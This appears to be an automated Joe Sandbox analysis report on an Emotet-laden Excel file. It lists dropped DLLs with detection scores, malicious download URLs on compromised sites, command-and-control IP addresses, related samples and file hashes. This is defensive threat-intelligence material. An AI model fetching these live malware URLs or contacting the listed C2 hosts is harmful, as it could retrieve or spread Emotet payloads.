                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr3.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr1.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr2.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dll29%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dll40%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dll65%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dll34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dll42%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr1.ocx65%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr2.ocx34%MetadefenderBrowse
                      C:\Users\user\uxevr2.ocx42%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr3.ocx29%MetadefenderBrowse
                      C:\Users\user\uxevr3.ocx40%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll (copy)34%MetadefenderBrowse
                      C:\Windows\System32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll (copy)42%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll (copy)29%MetadefenderBrowse
                      C:\Windows\System32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll (copy)40%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\PlMfP\OpoHHoBHS.dll (copy)65%ReversingLabsWin64.Trojan.Emotet
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      kuluckaci.com8%VirustotalBrowse
                      mcapublicschool.com9%VirustotalBrowse
                      moorworld.com5%VirustotalBrowse
                      microlent.com3%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      https://173.82.82.196:8080/100%URL Reputationmalware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://mcapublicschool.com/Achievements/r4psv/100%Avira URL Cloudmalware
                      https://173.82.82.196/q100%Avira URL Cloudmalware
                      http://kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://173.82.82.196:8080/D.100%Avira URL Cloudmalware
                      https://173.82.82.196:8080/bL100%Avira URL Cloudmalware
                      https://173.82.82.196:8080/H.100%Avira URL Cloudmalware
                      https://173.82.82.196/100%URL Reputationmalware
                      https://173.82.82.196:8080/e100%Avira URL Cloudmalware
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      https://microlent.com/admin/3/100%Avira URL Cloudmalware
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://173.82.82.196/vL100%Avira URL Cloudmalware
                      https://173.82.82.196:8080/i100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://173.82.82.196/4.100%Avira URL Cloudmalware
                      https://173.82.82.196/nL100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      kuluckaci.com
                      185.86.13.242
                      truetrueunknown
                      mcapublicschool.com
                      103.133.214.149
                      truefalseunknown
                      moorworld.com
                      211.149.139.157
                      truefalseunknown
                      microlent.com
                      103.195.4.8
                      truefalseunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://mcapublicschool.com/Achievements/r4psv/true
                      • Avira URL Cloud: malware
                      unknown
                      http://kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/true
                      • Avira URL Cloud: malware
                      unknown
                      https://microlent.com/admin/3/true
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://173.82.82.196:8080/regsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmptrue
                      • URL Reputation: malware
                      unknown
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://173.82.82.196/qregsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://173.82.82.196:8080/D.regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://173.82.82.196:8080/bLregsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://173.82.82.196:8080/H.regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://173.82.82.196/regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmptrue
                        • URL Reputation: malware
                        unknown
                        https://173.82.82.196:8080/eregsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://173.82.82.196/vLregsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://173.82.82.196:8080/iregsvr32.exe, 00000007.00000002.1248815645.00000000002E0000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://173.82.82.196/4.regsvr32.exe, 00000004.00000003.973255810.0000000000496000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1248897597.0000000000496000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.1249073187.0000000002D6F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1249032970.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1249049684.0000000002F4A000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://173.82.82.196/nLregsvr32.exe, 00000009.00000002.1248892503.00000000004FB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            103.133.214.149
                            mcapublicschool.comIndia
                            133643EWEBGURU-ASEWEBGURUINfalse
                            173.82.82.196
                            unknownUnited States
                            35916MULTA-ASN1UStrue
                            185.86.13.242
                            kuluckaci.comTurkey
                            29262IDEALHOSTINGTRtrue
                            103.195.4.8
                            microlent.comHong Kong
                            64022KAMATERAINC-AS-APKamateraIncHKfalse
                            211.149.139.157
                            moorworld.comChina
                            38283CHINANET-SCIDC-AS-APCHINANETSiChuanTelecomInternetDatafalse
                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:632106
                            Start date and time: 23/05/202209:55:442022-05-23 09:55:44 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 50s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Scan 2022.20.05_0910.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:13
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@16/17@4/5
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 51.4% (good quality ratio 27.6%)
                            • Quality average: 32.8%
                            • Quality standard deviation: 37.5%
                            HCA Information:
                            • Successful, ratio: 95%
                            • Number of executed functions: 45
                            • Number of non-executed functions: 247
                            Cookbook Comments:
                            • Found application associated with file extension: .xls
                            • Adjust boot time
                            • Enable AMSI
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.226
                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            TimeTypeDescription
                            09:57:22API Interceptor3237x Sleep call for process: regsvr32.exe modified
                            09:57:24API Interceptor444x Sleep call for process: svchost.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            103.133.214.1494921176754627453124.xlsGet hashmaliciousBrowse
                            • mcapublicschool.com/Achievements/r4psv/
                            10082376542717622006.xlsGet hashmaliciousBrowse
                            • mcapublicschool.com/Achievements/r4psv/
                            6691113204648532361.xlsGet hashmaliciousBrowse
                            • mcapublicschool.com/Achievements/r4psv/
                            173.82.82.196Details.lnkGet hashmaliciousBrowse
                              Rechnung.xlsGet hashmaliciousBrowse
                                RechnungsDetails.xlsGet hashmaliciousBrowse
                                  Rechnungskorrektur 2022.20.05_1305.lnkGet hashmaliciousBrowse
                                    Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                      RechnungsDetails 2022.20.05_1044.lnkGet hashmaliciousBrowse
                                        Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                          melimar.com.xlsGet hashmaliciousBrowse
                                            AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                              qJhkILqiEA.dllGet hashmaliciousBrowse
                                                ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                  uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                    qJhkILqiEA.dllGet hashmaliciousBrowse
                                                      kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                        ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                          uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                            KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                              EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                  185.86.13.2424921176754627453124.xlsGet hashmaliciousBrowse
                                                                  • kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/
                                                                  10082376542717622006.xlsGet hashmaliciousBrowse
                                                                  • kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/
                                                                  6691113204648532361.xlsGet hashmaliciousBrowse
                                                                  • kuluckaci.com/yarisma/cgi-bin/aIuI4Ukdtl730sP1F/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  microlent.com4921176754627453124.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Univ-pau_form.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  10082376542717622006.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  6691113204648532361.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Info 83177.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  EL_1705.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  DATA_5376.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  DETAILS-809816165.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  MES-0467746676.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  moorworld.com4921176754627453124.xlsGet hashmaliciousBrowse
                                                                  • 211.149.139.157
                                                                  10082376542717622006.xlsGet hashmaliciousBrowse
                                                                  • 211.149.139.157
                                                                  6691113204648532361.xlsGet hashmaliciousBrowse
                                                                  • 211.149.139.157
                                                                  kuluckaci.com4921176754627453124.xlsGet hashmaliciousBrowse
                                                                  • 185.86.13.242
                                                                  10082376542717622006.xlsGet hashmaliciousBrowse
                                                                  • 185.86.13.242
                                                                  6691113204648532361.xlsGet hashmaliciousBrowse
                                                                  • 185.86.13.242
                                                                  mcapublicschool.com4921176754627453124.xlsGet hashmaliciousBrowse
                                                                  • 103.133.214.149
                                                                  10082376542717622006.xlsGet hashmaliciousBrowse
                                                                  • 103.133.214.149
                                                                  6691113204648532361.xlsGet hashmaliciousBrowse
                                                                  • 103.133.214.149
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  MULTA-ASN1USDetails.lnkGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  Rechnung.xlsGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  RechnungsDetails.xlsGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  Rechnungskorrektur 2022.20.05_1305.lnkGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  RechnungsDetails 2022.20.05_1044.lnkGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  melimar.com.xlsGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  qJhkILqiEA.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  qJhkILqiEA.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                  • 173.82.82.196
                                                                  EWEBGURU-ASEWEBGURUINnnQLG95Iw5.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  znINSa9qND.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  jb3jwePvPr.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  jctwPdlACc.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  UFmRNifdR0.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  rXxjkzHIQm.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  Azw8ucukGo.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  jihJNCDwu3.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  wfgqmT2Mlh.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  UFmRNifdR0.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  rXxjkzHIQm.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  MmLkS7BBt4.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  M8oe4lXnK4.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  9ikGlksMpV.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  4921176754627453124.xlsGet hashmaliciousBrowse
                                                                  • 103.133.214.149
                                                                  10082376542717622006.xlsGet hashmaliciousBrowse
                                                                  • 103.133.214.149
                                                                  6691113204648532361.xlsGet hashmaliciousBrowse
                                                                  • 103.133.214.149
                                                                  yRObhBb6ES.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  pCVON5nWr9.dllGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  informe_002.xlsGet hashmaliciousBrowse
                                                                  • 103.133.214.242
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  7dcce5b76c8b17472d024758970a406bRechnung.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Invoice.docxGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  RechnungsDetails.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  melimar.com.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  report 340.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  info_1.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Facture_09.02.2022_V2.xlsbGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Scan 69.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  Address Changed.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  10082376542717622006.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  6691113204648532361.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  E318709655.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  OGgZVa2y3B.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  E282497021.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  E2992512590.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  L1877777548.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  SecuriteInfo.com.Exploit.Siggen3.32399.24702.xlsGet hashmaliciousBrowse
                                                                  • 103.195.4.8
                                                                  No context
                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                  File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                  Category:dropped
                                                                  Size (bytes):61480
                                                                  Entropy (8bit):7.9951219482618905
                                                                  Encrypted:true
                                                                  SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                  MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                  SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                  SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                  SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                  Malicious:false
                                                                  Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                  Process:C:\Windows\System32\regsvr32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):330
                                                                  Entropy (8bit):3.126909434994818
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKIHoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:APkPlE99SNxAhUesE1
                                                                  MD5:18DBF570B485AB42C737F80347FF381B
                                                                  SHA1:8BF391F1A59133B61B16F398FA3C473B2C461673
                                                                  SHA-256:CB9C43DF7C58ACAECC9B64F971BA27EB6C15D2D367276941C2656D837AA9F9A9
                                                                  SHA-512:8D34A030DF21D6BF15BFA9653FE4C374F3CB15205EF9ED80B7A3D667D6236EB2791E7FFD79B848D2F76C645EC52C63E9762AE98D2841C3C378D3078A1D9AC78B
                                                                  Malicious:false
                                                                  Preview:p...... ........U....n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:downloaded
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.158088154364803
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT50JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TYRIvgMSS3AyUrhYu3j
                                                                  MD5:415A33A830691C3A730AE345F14C7F30
                                                                  SHA1:B6FBFAB79E9DE7B81E692149E8059113169AC374
                                                                  SHA-256:47F24531BCBBF0C36792AF57CEB134B25E2481AE20B53D74283FBA4E542261BA
                                                                  SHA-512:0C92DC9608770EE109C7641B0F46E151CC06A9EE5B8789BC9498C8879E12C1515D46F8F320D54B10DF292121867EA4080C93D2951C1B57C816D6E37D7BA26731
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Metadefender, Detection: 29%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 40%
                                                                  IE Cache URL:http://mcapublicschool.com/Achievements/r4psv/
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.15810876493923
                                                                  Encrypted:false
                                                                  SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTC0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TPRIvgMSS3AyUrhYu3j
                                                                  MD5:CEA8BCCAAFA4CAD4EE2B6E9C3BD9C5C0
                                                                  SHA1:88380A35FFC07852B9FACEFF786267DF969A0488
                                                                  SHA-256:BAC00AC59383049CF72FC97827D2C8D773FF1ACFC7A132630B133EEDAF9A8241
                                                                  SHA-512:A2048D39C24CE94A1D1DF97C577A30A5FAF7573ADC80517381AFDBE769C0D0AF46EDA34B9E897766802440D535DA507EB8C520BD65E13F9D599490EC79836956
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 65%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:downloaded
                                                                  Size (bytes):365056
                                                                  Entropy (8bit):7.158108067630563
                                                                  Encrypted:false
